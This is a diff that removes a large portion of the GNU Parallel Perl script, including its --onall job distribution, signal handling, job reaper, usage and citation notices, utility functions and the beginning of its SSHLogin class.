-	    ::min($Global::minimal_command_line_length,
-		  int($maxlen{$sshlogin}/2));
-	::debug("init", "Timing from -S:$sshlogin ncpus:",$ncpus{$sshlogin},
-		" ncores:", $ncores{$sshlogin},
-		" time_to_login:", $time_to_login{$sshlogin},
-		" maxlen:", $maxlen{$sshlogin},
-		" min_max_len:", $Global::minimal_command_line_length,"\n");
-    }
-}
-
-sub onall {
-    sub tmp_joblog {
-	my $joblog = shift;
-	if(not defined $joblog) {
-	    return undef;
-	}
-	my ($fh, $tmpfile) = ::tmpfile(SUFFIX => ".log");
-	close $fh;
-	return $tmpfile;
-    }
-    my @command = @_;
-    if($Global::quoting) {
-       @command = shell_quote_empty(@command);
-    }
-
-    # Copy all @fhlist into tempfiles
-    my @argfiles = ();
-    for my $fh (@fhlist) {
-	my ($outfh, $name) = ::tmpfile(SUFFIX => ".all", UNLINK => 1);
-	print $outfh (<$fh>);
-	close $outfh;
-	push @argfiles, $name;
-    }
-    if(@opt::basefile) { setup_basefile(); }
-    # for each sshlogin do:
-    # parallel -S $sshlogin $command :::: @argfiles
-    #
-    # Pass some of the options to the sub-parallels, not all of them as
-    # -P should only go to the first, and -S should not be copied at all.
-    my $options =
-	join(" ",
-	     ((defined $opt::jobs) ? "-P $opt::jobs" : ""),
-	     ((defined $opt::linebuffer) ? "--linebuffer" : ""),
-	     ((defined $opt::ungroup) ? "-u" : ""),
-	     ((defined $opt::group) ? "-g" : ""),
-	     ((defined $opt::keeporder) ? "--keeporder" : ""),
-	     ((defined $opt::D) ? "-D $opt::D" : ""),
-	     ((defined $opt::plain) ? "--plain" : ""),
-	     ((defined $opt::max_chars) ? "--max-chars ".$opt::max_chars : ""),
-	);
-    my $suboptions =
-	join(" ",
-	     ((defined $opt::ungroup) ? "-u" : ""),
-	     ((defined $opt::linebuffer) ? "--linebuffer" : ""),
-	     ((defined $opt::group) ? "-g" : ""),
-	     ((defined $opt::files) ? "--files" : ""),
-	     ((defined $opt::keeporder) ? "--keeporder" : ""),
-	     ((defined $opt::colsep) ? "--colsep ".shell_quote($opt::colsep) : ""),
-	     ((@opt::v) ? "-vv" : ""),
-	     ((defined $opt::D) ? "-D $opt::D" : ""),
-	     ((defined $opt::timeout) ? "--timeout ".$opt::timeout : ""),
-	     ((defined $opt::plain) ? "--plain" : ""),
-	     ((defined $opt::retries) ? "--retries ".$opt::retries : ""),
-	     ((defined $opt::max_chars) ? "--max-chars ".$opt::max_chars : ""),
-	     ((defined $opt::arg_sep) ? "--arg-sep ".$opt::arg_sep : ""),
-	     ((defined $opt::arg_file_sep) ? "--arg-file-sep ".$opt::arg_file_sep : ""),
-	     (@opt::env ? map { "--env ".::shell_quote_scalar($_) } @opt::env : ""),
-	);
-    ::debug("init", "| $0 $options\n");
-    open(my $parallel_fh, "|-", "$0 --no-notice -j0 $options") ||
-	::die_bug("This does not run GNU Parallel: $0 $options");
-    my @joblogs;
-    for my $host (sort keys %Global::host) {
-	my $sshlogin = $Global::host{$host};
-	my $joblog = tmp_joblog($opt::joblog);
-	if($joblog) {
-	    push @joblogs, $joblog;
-	    $joblog = "--joblog $joblog";
-	}
-	my $quad = $opt::arg_file_sep || "::::";
-	::debug("init", "$0 $suboptions -j1 $joblog ",
-	    ((defined $opt::tag) ?
-	     "--tagstring ".shell_quote_scalar($sshlogin->string()) : ""),
-	     " -S ", shell_quote_scalar($sshlogin->string())," ",
-	     join(" ",shell_quote(@command))," $quad @argfiles\n");
-	print $parallel_fh "$0 $suboptions -j1 $joblog ",
-	    ((defined $opt::tag) ?
-	     "--tagstring ".shell_quote_scalar($sshlogin->string()) : ""),
-	     " -S ", shell_quote_scalar($sshlogin->string())," ",
-	     join(" ",shell_quote(@command))," $quad @argfiles\n";
-    }
-    close $parallel_fh;
-    $Global::exitstatus = $? >> 8;
-    debug("init", "--onall exitvalue ", $?);
-    if(@opt::basefile) { cleanup_basefile(); }
-    $Global::debug or unlink(@argfiles);
-    my %seen;
-    for my $joblog (@joblogs) {
-	# Append to $joblog
-	open(my $fh, "<", $joblog) || ::die_bug("Cannot open tmp joblog $joblog");
-	# Skip first line (header);
-	<$fh>;
-	print $Global::joblog (<$fh>);
-	close $fh;
-	unlink($joblog);
-    }
-}
-
-sub __SIGNAL_HANDLING__ {}
-
-sub save_original_signal_handler {
-    # Remember the original signal handler
-    # Returns: N/A
-    $SIG{TERM} ||= sub { exit 0; }; # $SIG{TERM} is not set on Mac OS X
-    $SIG{INT} = sub { if($opt::tmux) { qx { tmux kill-session -t p$$ }; }
-		      unlink keys %Global::unlink; exit -1  };
-    $SIG{TERM} = sub { if($opt::tmux) { qx { tmux kill-session -t p$$ }; }
-		      unlink keys %Global::unlink; exit -1  };
-    %Global::original_sig = %SIG;
-    $SIG{TERM} = sub {}; # Dummy until jobs really start
-}
-
-sub list_running_jobs {
-    # Returns: N/A
-    for my $v (values %Global::running) {
-        print $Global::original_stderr "$Global::progname: ",$v->replaced(),"\n";
-    }
-}
-
-sub start_no_new_jobs {
-    # Returns: N/A
-    $SIG{TERM} = $Global::original_sig{TERM};
-    print $Global::original_stderr
-        ("$Global::progname: SIGTERM received. No new jobs will be started.\n",
-         "$Global::progname: Waiting for these ", scalar(keys %Global::running),
-         " jobs to finish. Send SIGTERM again to stop now.\n");
-    list_running_jobs();
-    $Global::start_no_new_jobs ||= 1;
-}
-
-sub reaper {
-    # A job finished.
-    # Print the output.
-    # Start another job
-    # Returns: N/A
-    my $stiff;
-    my $children_reaped = 0;
-    debug("run", "Reaper ");
-    while (($stiff = waitpid(-1, &WNOHANG)) > 0) {
-	$children_reaped++;
-        if($Global::sshmaster{$stiff}) {
-            # This is one of the ssh -M: ignore
-            next;
-        }
-        my $job = $Global::running{$stiff};
-	# '-a <(seq 10)' will give us a pid not in %Global::running
-        $job or next;
-        $job->set_exitstatus($? >> 8);
-        $job->set_exitsignal($? & 127);
-        debug("run", "died (", $job->exitstatus(), "): ", $job->seq());
-        $job->set_endtime(::now());
-        if($stiff == $Global::tty_taken) {
-            # The process that died had the tty => release it
-            $Global::tty_taken = 0;
-        }
-
-        if(not $job->should_be_retried()) {
-	    # The job is done
-	    # Free the jobslot
-	    push @Global::slots, $job->slot();
-	    if($opt::timeout) {
-		# Update average runtime for timeout
-		$Global::timeoutq->update_delta_time($job->runtime());
-	    }
-            # Force printing now if the job failed and we are going to exit
-            my $print_now = ($opt::halt_on_error and $opt::halt_on_error == 2
-			     and $job->exitstatus());
-            if($opt::keeporder and not $print_now) {
-                print_earlier_jobs($job);
-            } else {
-                $job->print();
-            }
-            if($job->exitstatus()) {
-		process_failed_job($job);
-	    }
-
-        }
-        my $sshlogin = $job->sshlogin();
-        $sshlogin->dec_jobs_running();
-        $sshlogin->inc_jobs_completed();
-        $Global::total_running--;
-        delete $Global::running{$stiff};
-	start_more_jobs();
-    }
-    debug("run", "done ");
-    return $children_reaped;
-}
-
-sub process_failed_job {
-    # The jobs had a exit status <> 0, so error
-    # Returns: N/A
-    my $job = shift;
-    $Global::exitstatus++;
-    $Global::total_failed++;
-    if($opt::halt_on_error) {
-	if($opt::halt_on_error == 1
-	   or
-	   ($opt::halt_on_error < 1 and $Global::total_failed > 3
-	    and
-	    $Global::total_failed / $Global::total_started > $opt::halt_on_error)) {
-	    # If halt on error == 1 or --halt 10%
-	    # we should gracefully exit
-	    print $Global::original_stderr
-		("$Global::progname: Starting no more jobs. ",
-		 "Waiting for ", scalar(keys %Global::running),
-		 " jobs to finish. This job failed:\n",
-		 $job->replaced(),"\n");
-	    $Global::start_no_new_jobs ||= 1;
-	    $Global::halt_on_error_exitstatus = $job->exitstatus();
-	} elsif($opt::halt_on_error == 2) {
-	    # If halt on error == 2 we should exit immediately
-	    print $Global::original_stderr
-		("$Global::progname: This job failed:\n",
-		 $job->replaced(),"\n");
-	    exit ($job->exitstatus());
-	}
-    }
-}
-
-{
-    my (%print_later,$job_end_sequence);
-
-    sub print_earlier_jobs {
-	# Print jobs completed earlier
-	# Returns: N/A
-	my $job = shift;
-	$print_later{$job->seq()} = $job;
-	$job_end_sequence ||= 1;
-	debug("run", "Looking for: $job_end_sequence ",
-	      "Current: ", $job->seq(), "\n");
-	for(my $j = $print_later{$job_end_sequence};
-	    $j or vec($Global::job_already_run,$job_end_sequence,1);
-	    $job_end_sequence++,
-	    $j = $print_later{$job_end_sequence}) {
-	    debug("run", "Found job end $job_end_sequence");
-	    if($j) {
-		$j->print();
-		delete $print_later{$job_end_sequence};
-	    }
-	}
-    }
-}
-
-sub __USAGE__ {}
-
-sub wait_and_exit {
-    # If we do not wait, we sometimes get segfault
-    # Returns: N/A
-    my $error = shift;
-    if($error) {
-	# Kill all without printing
-	for my $job (values %Global::running) {
-	    $job->kill("TERM");
-	    $job->kill("TERM");
-	}
-    }
-    for (keys %Global::unkilled_children) {
-        kill 9, $_;
-        waitpid($_,0);
-        delete $Global::unkilled_children{$_};
-    }
-    wait();
-    exit($error);
-}
-
-sub die_usage {
-    # Returns: N/A
-    usage();
-    wait_and_exit(255);
-}
-
-sub usage {
-    # Returns: N/A
-    print join
-	("\n",
-	 "Usage:",
-	 "",
-	 "$Global::progname [options] [command [arguments]] < list_of_arguments",
-	 "$Global::progname [options] [command [arguments]] (::: arguments|:::: argfile(s))...",
-	 "cat ... | $Global::progname --pipe [options] [command [arguments]]",
-	 "",
-	 "-j n            Run n jobs in parallel",
-	 "-k              Keep same order",
-	 "-X              Multiple arguments with context replace",
-	 "--colsep regexp Split input on regexp for positional replacements",
-	 "{} {.} {/} {/.} {#} {%} {= perl code =} Replacement strings",
-	 "{3} {3.} {3/} {3/.} {=3 perl code =}    Positional replacement strings",
-	 "With --plus:    {} = {+/}/{/} = {.}.{+.} = {+/}/{/.}.{+.} = {..}.{+..} =",
-	 "                {+/}/{/..}.{+..} = {...}.{+...} = {+/}/{/...}.{+...}",
-	 "",
-	 "-S sshlogin     Example: foo\@server.example.com",
-	 "--slf ..        Use ~/.parallel/sshloginfile as the list of sshlogins",
-	 "--trc {}.bar    Shorthand for --transfer --return {}.bar --cleanup",
-	 "--onall         Run the given command with argument on all sshlogins",
-	 "--nonall        Run the given command with no arguments on all sshlogins",
-	 "",
-	 "--pipe          Split stdin (standard input) to multiple jobs.",
-	 "--recend str    Record end separator for --pipe.",
-	 "--recstart str  Record start separator for --pipe.",
-	 "",
-	 "See 'man $Global::progname' for details",
-	 "",
-	 "When using programs that use GNU Parallel to process data for publication please cite:",
-	 "",
-	 "O. Tange (2011): GNU Parallel - The Command-Line Power Tool,",
-	 ";login: The USENIX Magazine, February 2011:42-47.",
-	 "",
-	 "Or you can get GNU Parallel without this requirement by paying 10000 EUR.",
-	 "");
-}
-
-
-sub citation_notice {
-    # if --no-notice or --plain: do nothing
-    # if stderr redirected: do nothing
-    # if ~/.parallel/will-cite: do nothing
-    # else: print citation notice to stderr
-    if($opt::no_notice
-       or
-       $opt::plain
-       or
-       not -t $Global::original_stderr
-       or
-       -e $ENV{'HOME'}."/.parallel/will-cite") {
-	# skip
-    } else {
-	print $Global::original_stderr
-	    ("When using programs that use GNU Parallel to process data for publication please cite:\n",
-	     "\n",
-	     "  O. Tange (2011): GNU Parallel - The Command-Line Power Tool,\n",
-	     "  ;login: The USENIX Magazine, February 2011:42-47.\n",
-	     "\n",
-	     "This helps funding further development; and it won't cost you a cent.\n",
-	     "Or you can get GNU Parallel without this requirement by paying 10000 EUR.\n",
-	     "\n",
-	     "To silence this citation notice run 'parallel --bibtex' once or use '--no-notice'.\n\n",
-	    );
-	flush $Global::original_stderr;
-    }
-}
-
-
-sub warning {
-    my @w = @_;
-    my $fh = $Global::original_stderr || *STDERR;
-    my $prog = $Global::progname || "parallel";
-    print $fh $prog, ": Warning: ", @w;
-}
-
-
-sub error {
-    my @w = @_;
-    my $fh = $Global::original_stderr || *STDERR;
-    my $prog = $Global::progname || "parallel";
-    print $fh $prog, ": Error: ", @w;
-}
-
-
-sub die_bug {
-    my $bugid = shift;
-    print STDERR
-	("$Global::progname: This should not happen. You have found a bug.\n",
-	 "Please contact <parallel\@gnu.org> and include:\n",
-	 "* The version number: $Global::version\n",
-	 "* The bugid: $bugid\n",
-	 "* The command line being run\n",
-	 "* The files being read (put the files on a webserver if they are big)\n",
-	 "\n",
-	 "If you get the error on smaller/fewer files, please include those instead.\n");
-    ::wait_and_exit(255);
-}
-
-sub version {
-    # Returns: N/A
-    if($opt::tollef and not $opt::gnu) {
-	print "WARNING: YOU ARE USING --tollef. IF THINGS ARE ACTING WEIRD USE --gnu.\n";
-    }
-    print join("\n",
-               "GNU $Global::progname $Global::version",
-               "Copyright (C) 2007,2008,2009,2010,2011,2012,2013,2014 Ole Tange and Free Software Foundation, Inc.",
-               "License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>",
-               "This is free software: you are free to change and redistribute it.",
-               "GNU $Global::progname comes with no warranty.",
-               "",
-               "Web site: http://www.gnu.org/software/${Global::progname}\n",
-	       "When using programs that use GNU Parallel to process data for publication please cite:\n",
-	       "O. Tange (2011): GNU Parallel - The Command-Line Power Tool, ",
-	       ";login: The USENIX Magazine, February 2011:42-47.\n",
-	       "Or you can get GNU Parallel without this requirement by paying 10000 EUR.\n",
-        );
-}
-
-sub bibtex {
-    # Returns: N/A
-    if($opt::tollef and not $opt::gnu) {
-	print "WARNING: YOU ARE USING --tollef. IF THINGS ARE ACTING WEIRD USE --gnu.\n";
-    }
-    print join("\n",
-	       "When using programs that use GNU Parallel to process data for publication please cite:",
-	       "",
-               "\@article{Tange2011a,",
-	       " title = {GNU Parallel - The Command-Line Power Tool},",
-	       " author = {O. Tange},",
-	       " address = {Frederiksberg, Denmark},",
-	       " journal = {;login: The USENIX Magazine},",
-	       " month = {Feb},",
-	       " number = {1},",
-	       " volume = {36},",
-	       " url = {http://www.gnu.org/s/parallel},",
-	       " year = {2011},",
-	       " pages = {42-47}",
-	       "}",
-	       "",
-	       "(Feel free to use \\nocite{Tange2011a})",
-	       "",
-	       "This helps funding further development.",
-	       "",
-	       "Or you can get GNU Parallel without this requirement by paying 10000 EUR.",
-	       ""
-        );
-    while(not -e $ENV{'HOME'}."/.parallel/will-cite") {
-	print "\nType: 'will cite' and press enter.\n> ";
-	my $input = <STDIN>;
-	if($input =~ /will cite/i) {
-	    mkdir $ENV{'HOME'}."/.parallel";
-	    open (my $fh, ">", $ENV{'HOME'}."/.parallel/will-cite")
-		|| ::die_bug("Cannot write: ".$ENV{'HOME'}."/.parallel/will-cite");
-	    close $fh;
-	    print "\nThank you for your support. It is much appreciated. The citation\n",
-	    "notice is now silenced.\n";
-	}
-    }
-}
-
-sub show_limits {
-    # Returns: N/A
-    print("Maximal size of command: ",Limits::Command::real_max_length(),"\n",
-          "Maximal used size of command: ",Limits::Command::max_length(),"\n",
-          "\n",
-          "Execution of  will continue now, and it will try to read its input\n",
-          "and run commands; if this is not what you wanted to happen, please\n",
-          "press CTRL-D or CTRL-C\n");
-}
-
-sub __GENERIC_COMMON_FUNCTION__ {}
-
-sub uniq {
-    # Remove duplicates and return unique values
-    return keys %{{ map { $_ => 1 } @_ }};
-}
-
-sub min {
-    # Returns:
-    #   Minimum value of array
-    my $min;
-    for (@_) {
-        # Skip undefs
-        defined $_ or next;
-        defined $min or do { $min = $_; next; }; # Set $_ to the first non-undef
-        $min = ($min < $_) ? $min : $_;
-    }
-    return $min;
-}
-
-sub max {
-    # Returns:
-    #   Maximum value of array
-    my $max;
-    for (@_) {
-        # Skip undefs
-        defined $_ or next;
-        defined $max or do { $max = $_; next; }; # Set $_ to the first non-undef
-        $max = ($max > $_) ? $max : $_;
-    }
-    return $max;
-}
-
-sub sum {
-    # Returns:
-    #   Sum of values of array
-    my @args = @_;
-    my $sum = 0;
-    for (@args) {
-        # Skip undefs
-        $_ and do { $sum += $_; }
-    }
-    return $sum;
-}
-
-sub undef_as_zero {
-    my $a = shift;
-    return $a ? $a : 0;
-}
-
-sub undef_as_empty {
-    my $a = shift;
-    return $a ? $a : "";
-}
-
-{
-    my $hostname;
-    sub hostname {
-	if(not $hostname) {
-	    $hostname = `hostname`;
-	    chomp($hostname);
-	    $hostname ||= "nohostname";
-	}
-	return $hostname;
-    }
-}
-
-sub which {
-    # Input:
-    #   @programs = programs to find the path to
-    # Returns:
-    #   @full_path = full paths to @programs. Nothing if not found
-    my @which;
-    for my $prg (@_) {
-	push @which, map { $_."/".$prg } grep { -x $_."/".$prg } split(":",$ENV{'PATH'});
-    }
-    return @which;
-}
-
-{
-    my ($regexp,%fakename);
-
-    sub parent_shell {
-	# Input:
-	#   $pid = pid to see if (grand)*parent is a shell
-	# Returns:
-	#   $shellpath = path to shell - undef if no shell found
-	my $pid = shift;
-	if(not $regexp) {
-	    # All shells known to mankind
-	    #
-	    # ash bash csh dash fdsh fish fizsh ksh ksh93 mksh pdksh
-	    # posh rbash rush rzsh sash sh static-sh tcsh yash zsh
-	    my @shells = qw(ash bash csh dash fdsh fish fizsh ksh
-                            ksh93 mksh pdksh posh rbash rush rzsh
-                            sash sh static-sh tcsh yash zsh -sh -csh);
-	    # Can be formatted as:
-	    #   [sh]  -sh  sh  busybox sh
-	    #   /bin/sh /sbin/sh /opt/csw/sh
-	    # NOT: foo.sh sshd crash flush pdflush scosh fsflush ssh
-	    my $shell = "(?:".join("|",@shells).")";
-	    $regexp = '^((\[)('. $shell. ')(\])|(|\S+/|busybox )('. $shell. '))($| )';
-	    %fakename = (
-		# csh and tcsh disguise themselves as -sh/-csh
-		"-sh" => ["csh", "tcsh"],
-		"-csh" => ["tcsh", "csh"],
-		);
-	}
-	my ($children_of_ref, $parent_of_ref, $name_of_ref) = pid_table();
-	my $shellpath;
-	my $testpid = $pid;
-	while($testpid) {
-	    ::debug("init", "shell? ". $name_of_ref->{$testpid}."\n");
-	    if($name_of_ref->{$testpid} =~ /$regexp/o) {
-		::debug("init", "which ".($3||$6)." => ");
-		$shellpath = (which($3 || $6,@{$fakename{$3 || $6}}))[0];
-		::debug("init", "shell path $shellpath\n");
-		$shellpath and last;
-	    }
-	    $testpid = $parent_of_ref->{$testpid};
-	}
-	return $shellpath;
-    }
-}
-
-{
-    my %pid_parentpid_cmd;
-
-    sub pid_table {
-	# Returns:
-	#   %children_of = { pid -> children of pid }
-	#   %parent_of = { pid -> pid of parent }
-	#   %name_of = { pid -> commandname }
-
-       	if(not %pid_parentpid_cmd) {
-	    # Filter for SysV-style `ps`
-	    my $sysv = q( ps -ef | perl -ane '1..1 and /^(.*)CO?MM?A?N?D/ and $s=length $1;).
-		q(s/^.{$s}//; print "@F[1,2] $_"' );
-	    # BSD-style `ps`
-	    my $bsd = q(ps -o pid,ppid,command -ax);
-	    %pid_parentpid_cmd =
-	    (
-	     'aix' => $sysv,
-	     'cygwin' => $sysv,
-	     'msys' => $sysv,
-	     'dec_osf' => $sysv,
-	     'darwin' => $bsd,
-	     'dragonfly' => $bsd,
-	     'freebsd' => $bsd,
-	     'gnu' => $sysv,
-	     'hpux' => $sysv,
-	     'linux' => $sysv,
-	     'mirbsd' => $bsd,
-	     'netbsd' => $bsd,
-	     'nto' => $sysv,
-	     'openbsd' => $bsd,
-	     'solaris' => $sysv,
-	     'svr5' => $sysv,
-	    );
-	}
-	$pid_parentpid_cmd{$^O} or ::die_bug("pid_parentpid_cmd for $^O missing");
-
-	my (@pidtable,%parent_of,%children_of,%name_of);
-	# Table with pid -> children of pid
-	@pidtable = `$pid_parentpid_cmd{$^O}`;
-	my $p=$$;
-	for (@pidtable) {
-	    # must match: 24436 21224 busybox ash
-	    /(\S+)\s+(\S+)\s+(\S+.*)/ or ::die_bug("pidtable format: $_");
-	    $parent_of{$1} = $2;
-	    push @{$children_of{$2}}, $1;
-	    $name_of{$1} = $3;
-	}
-	return(\%children_of, \%parent_of, \%name_of);
-    }
-}
-
-sub reap_usleep {
-    # Reap dead children.
-    # If no dead children: Sleep specified amount with exponential backoff
-    # Input:
-    #   $ms = milliseconds to sleep
-    # Returns:
-    #   $ms/2+0.001 if children reaped
-    #   $ms*1.1 if no children reaped
-    my $ms = shift;
-    if(reaper()) {
-	# Sleep exponentially shorter (1/2^n) if a job finished
-	return $ms/2+0.001;
-    } else {
-	if($opt::timeout) {
-	    $Global::timeoutq->process_timeouts();
-	}
-	usleep($ms);
-	Job::exit_if_disk_full();
-	if($opt::linebuffer) {
-	    for my $job (values %Global::running) {
-		$job->print();
-	    }
-	}
-	# Sleep exponentially longer (1.1^n) if a job did not finish
-	# though at most 1000 ms.
-	return (($ms < 1000) ? ($ms * 1.1) : ($ms));
-    }
-}
-
-sub usleep {
-    # Sleep this many milliseconds.
-    # Input:
-    #   $ms = milliseconds to sleep
-    my $ms = shift;
-    ::debug(int($ms),"ms ");
-    select(undef, undef, undef, $ms/1000);
-}
-
-sub now {
-    # Returns time since epoch as in seconds with 3 decimals
-    # Uses:
-    #   @Global::use
-    # Returns:
-    #   $time = time now with millisecond accuracy
-    if(not $Global::use{"Time::HiRes"}) {
-	if(eval "use Time::HiRes qw ( time );") {
-	    eval "sub TimeHiRestime { return Time::HiRes::time };";
-	} else {
-	    eval "sub TimeHiRestime { return time() };";
-	}
-	$Global::use{"Time::HiRes"} = 1;
-    }
-
-    return (int(TimeHiRestime()*1000))/1000;
-}
-
-sub multiply_binary_prefix {
-    # Evalualte numbers with binary prefix
-    # Ki=2^10, Mi=2^20, Gi=2^30, Ti=2^40, Pi=2^50, Ei=2^70, Zi=2^80, Yi=2^80
-    # ki=2^10, mi=2^20, gi=2^30, ti=2^40, pi=2^50, ei=2^70, zi=2^80, yi=2^80
-    # K =2^10, M =2^20, G =2^30, T =2^40, P =2^50, E =2^70, Z =2^80, Y =2^80
-    # k =10^3, m =10^6, g =10^9, t=10^12, p=10^15, e=10^18, z=10^21, y=10^24
-    # 13G = 13*1024*1024*1024 = 13958643712
-    # Input:
-    #   $s = string with prefixes
-    # Returns:
-    #   $value = int with prefixes multiplied
-    my $s = shift;
-    $s =~ s/ki/*1024/gi;
-    $s =~ s/mi/*1024*1024/gi;
-    $s =~ s/gi/*1024*1024*1024/gi;
-    $s =~ s/ti/*1024*1024*1024*1024/gi;
-    $s =~ s/pi/*1024*1024*1024*1024*1024/gi;
-    $s =~ s/ei/*1024*1024*1024*1024*1024*1024/gi;
-    $s =~ s/zi/*1024*1024*1024*1024*1024*1024*1024/gi;
-    $s =~ s/yi/*1024*1024*1024*1024*1024*1024*1024*1024/gi;
-    $s =~ s/xi/*1024*1024*1024*1024*1024*1024*1024*1024*1024/gi;
-
-    $s =~ s/K/*1024/g;
-    $s =~ s/M/*1024*1024/g;
-    $s =~ s/G/*1024*1024*1024/g;
-    $s =~ s/T/*1024*1024*1024*1024/g;
-    $s =~ s/P/*1024*1024*1024*1024*1024/g;
-    $s =~ s/E/*1024*1024*1024*1024*1024*1024/g;
-    $s =~ s/Z/*1024*1024*1024*1024*1024*1024*1024/g;
-    $s =~ s/Y/*1024*1024*1024*1024*1024*1024*1024*1024/g;
-    $s =~ s/X/*1024*1024*1024*1024*1024*1024*1024*1024*1024/g;
-
-    $s =~ s/k/*1000/g;
-    $s =~ s/m/*1000*1000/g;
-    $s =~ s/g/*1000*1000*1000/g;
-    $s =~ s/t/*1000*1000*1000*1000/g;
-    $s =~ s/p/*1000*1000*1000*1000*1000/g;
-    $s =~ s/e/*1000*1000*1000*1000*1000*1000/g;
-    $s =~ s/z/*1000*1000*1000*1000*1000*1000*1000/g;
-    $s =~ s/y/*1000*1000*1000*1000*1000*1000*1000*1000/g;
-    $s =~ s/x/*1000*1000*1000*1000*1000*1000*1000*1000*1000/g;
-
-    $s = eval $s;
-    ::debug($s);
-    return $s;
-}
-
-sub tmpfile {
-    # Create tempfile as $TMPDIR/parXXXXX
-    # Returns:
-    #   $filename = file name created
-    return ::tempfile(DIR=>$ENV{'TMPDIR'}, TEMPLATE => 'parXXXXX', @_);
-}
-
-sub __DEBUGGING__ {}
-
-sub debug {
-    # Uses:
-    #   $Global::debug
-    #   %Global::fd
-    # Returns: N/A
-    $Global::debug or return;
-    @_ = grep { defined $_ ? $_ : "" } @_;
-    if($Global::debug eq "all" or $Global::debug eq $_[0]) {
-	if($Global::fd{1}) {
-	    # Original stdout was saved
-	    my $stdout = $Global::fd{1};
-	    print $stdout @_[1..$#_];
-	} else {
-	    print @_[1..$#_];
-	}
-    }
-}
-
-sub my_memory_usage {
-    # Returns:
-    #   memory usage if found
-    #   0 otherwise
-    use strict;
-    use FileHandle;
-
-    my $pid = $$;
-    if(-e "/proc/$pid/stat") {
-        my $fh = FileHandle->new("</proc/$pid/stat");
-
-        my $data = <$fh>;
-        chomp $data;
-        $fh->close;
-
-        my @procinfo = split(/\s+/,$data);
-
-        return undef_as_zero($procinfo[22]);
-    } else {
-        return 0;
-    }
-}
-
-sub my_size {
-    # Returns:
-    #   $size = size of object if Devel::Size is installed
-    #   -1 otherwise
-    my @size_this = (@_);
-    eval "use Devel::Size qw(size total_size)";
-    if ($@) {
-        return -1;
-    } else {
-        return total_size(@_);
-    }
-}
-
-sub my_dump {
-    # Returns:
-    #   ascii expression of object if Data::Dump(er) is installed
-    #   error code otherwise
-    my @dump_this = (@_);
-    eval "use Data::Dump qw(dump);";
-    if ($@) {
-        # Data::Dump not installed
-        eval "use Data::Dumper;";
-        if ($@) {
-            my $err =  "Neither Data::Dump nor Data::Dumper is installed\n".
-                "Not dumping output\n";
-            print $Global::original_stderr $err;
-            return $err;
-        } else {
-            return Dumper(@dump_this);
-        }
-    } else {
-	# Create a dummy Data::Dump:dump as Hans Schou sometimes has
-	# it undefined
-	eval "sub Data::Dump:dump {}";
-        eval "use Data::Dump qw(dump);";
-        return (Data::Dump::dump(@dump_this));
-    }
-}
-
-sub my_croak {
-    eval "use Carp; 1";
-    $Carp::Verbose = 1;
-    croak(@_);
-}
-
-sub my_carp {
-    eval "use Carp; 1";
-    $Carp::Verbose = 1;
-    carp(@_);
-}
-
-sub __OBJECT_ORIENTED_PARTS__ {}
-
-package SSHLogin;
-
-sub new {
-    my $class = shift;
-    my $sshlogin_string = shift;
-    my $ncpus;
-    my %hostgroups;
-    # SSHLogins can have these formats:
-    #   @grp+grp/ncpu//usr/bin/ssh user@server
-    #   ncpu//usr/bin/ssh user@server
-    #   /usr/bin/ssh user@server
-    #   user@server
-    #   ncpu/user@server
-    #   @grp+grp/user@server
-    if($sshlogin_string =~ s:^\@([^/]+)/?::) {
-        # Look for SSHLogin hostgroups
-        %hostgroups = map { $_ => 1 } split(/\+/, $1);
-    }
-    if ($sshlogin_string =~ s:^(\d+)/::) {
-        # Override default autodetected ncpus unless missing
-        $ncpus = $1;
-    }
-    my $string = $sshlogin_string;
-    # An SSHLogin is always in the hostgroup of its $string-name
-    $hostgroups{$string} = 1;
-    @Global::hostgroups{keys %hostgroups} = values %hostgroups;
-    my @unget = ();
-    my $no_slash_string = $string;
-    $no_slash_string =~ s/[^-a-z0-9:]/_/gi;
-    return bless {
-        'string' => $string,
-        'jobs_running' => 0,
-        'jobs_completed' => 0,
-        'maxlength' => undef,
-        'max_jobs_running' => undef,
-        'orig_max_jobs_running' => undef,
-        'ncpus' => $ncpus,
-        'hostgroups' => \%hostgroups,
-        'sshcommand' => undef,
-        'serverlogin' => undef,
-        'control_path_dir' => undef,
-        'control_path' => undef,
-	'time_to_login' => undef,
-	'last_login_at' => undef,
-        'loadavg_file' => $ENV{'HOME'} . "/.parallel/tmp/loadavg-" .
-            $no_slash_string,
-        'loadavg' => undef,
-	'last_loadavg_update' => 0,
-        'swap_activity_file' => $ENV{'HOME'} . "/.parallel/tmp/swap_activity-" .
-            $no_slash_string,
-        'swap_activity' => undef,
-    }, ref($class) || $class;
-}
-
-sub DESTROY {
-    my $self = shift;
-    # Remove temporary files if they are created.
-    unlink $self->{'loadavg_file'};
-    unlink $self->{'swap_activity_file'};
-}
-
-sub string {
-    my $self = shift;
-    return $self->{'string'};
-}
-
-sub jobs_running {
-    my $self = shift;
-
-    return ($self->{'jobs_running'} || "0");
-}
-
-sub inc_jobs_running {
-    my $self = shift;
-    $self->{'jobs_running'}++;
-}
-
-sub dec_jobs_running {
-    my $self = shift;
-    $self->{'jobs_running'}--;
-}
-
-sub set_maxlength {
-    my $self = shift;
-    $self->{'maxlength'} = shift;
-}
-
-sub maxlength {
-    my $self = shift;
-    return $self->{'maxlength'};
-}
-
-sub jobs_completed {
-    my $self = shift;
-    return $self->{'jobs_completed'};
-}
-
-sub in_hostgroups {
-    # Input:
-    #   @hostgroups = the hostgroups to look for
-    # Returns:
-    #   true if intersection of @hostgroups and the hostgroups of this
-    #        SSHLogin is non-empty
-    my $self = shift;
-    return grep { defined $self->{'hostgroups'}{$_} } @_;
-}
-
-sub hostgroups {
-    my $self = shift;
-    return keys %{$self->{'hostgroups'}};
-}
-
-sub inc_jobs_completed {
-    my $self = shift;
-    $self->{'jobs_completed'}++;
-}
-
-sub set_max_jobs_running {
-    my $self = shift;
-    if(defined $self->{'max_jobs_running'}) {
-        $Global::max_jobs_running -= $self->{'max_jobs_running'};
-    }
-    $self->{'max_jobs_running'} = shift;
-    if(defined $self->{'max_jobs_running'}) {
-        # max_jobs_running could be resat if -j is a changed file
-        $Global::max_jobs_running += $self->{'max_jobs_running'};
-    }
-    # Initialize orig to the first non-zero value that comes around
-    $self->{'orig_max_jobs_running'} ||= $self->{'max_jobs_running'};
-}
-
-sub swapping {
-    my $self = shift;
-    my $swapping = $self->swap_activity();
-    return (not defined $swapping or $swapping)
-}
-
-sub swap_activity {
-    # If the currently known swap activity is too old:
-    #   Recompute a new one in the background
-    # Returns:
-    #   last swap activity computed
-    my $self = shift;
-    # Should we update the swap_activity file?
-    my $update_swap_activity_file = 0;
